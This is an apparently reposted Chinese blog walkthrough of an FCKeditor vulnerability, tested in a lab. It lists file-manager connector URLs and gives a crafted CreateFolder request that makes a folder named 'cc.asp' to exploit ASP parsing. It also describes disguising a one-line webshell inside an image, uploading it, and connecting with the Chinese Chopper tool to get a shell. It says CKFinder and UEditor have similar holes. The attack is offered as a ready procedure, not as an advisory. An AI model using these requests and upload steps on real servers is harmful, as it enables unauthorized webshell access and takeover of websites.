FCKeditor编辑器漏洞

news2025/1/15 17:21:12

FCKeditor在网页上属于开发源代码的文字编辑器，FCK是作者的名字

搭建环境

查看版本http://192.168.246.20:89/_whatsnew.html

编辑器界面http://192.168.246.20:89/_samples/default.html

常用上传地址

FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp

FCKeditor/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/asp/connector.asp

FCKeditor/editor/filemanager/browser/default/browser.html?Type=Image&Connector=../../connectors/asp/connector.asp

editor/filemanager/browser/default/browser.html?Type=Image&Connector=../../connectors/asp/connector.asp

本次用的

http://editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/fendo.asp&NewFolderName=x.asphttp://

只能上传图片，用工具把图片和一句话木马合并下，然后上传

固定访问路径/userfiles/image/文件名

手工创建一个可以访问的路径

这个是构造语句可以建立cc.asp的文件夹，在这个文件夹之内在上传文件

editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/cc.asp&NewFolderName=ss.asp

用菜刀连接

菜刀添加连接，密码，连接

其他的编辑器CKFinder，UEDITOR一般都是文件上传解析类漏洞，构造asp，传马，那shell

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.coloradmin.cn/o/1108310.html

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈，一经查实，立即删除！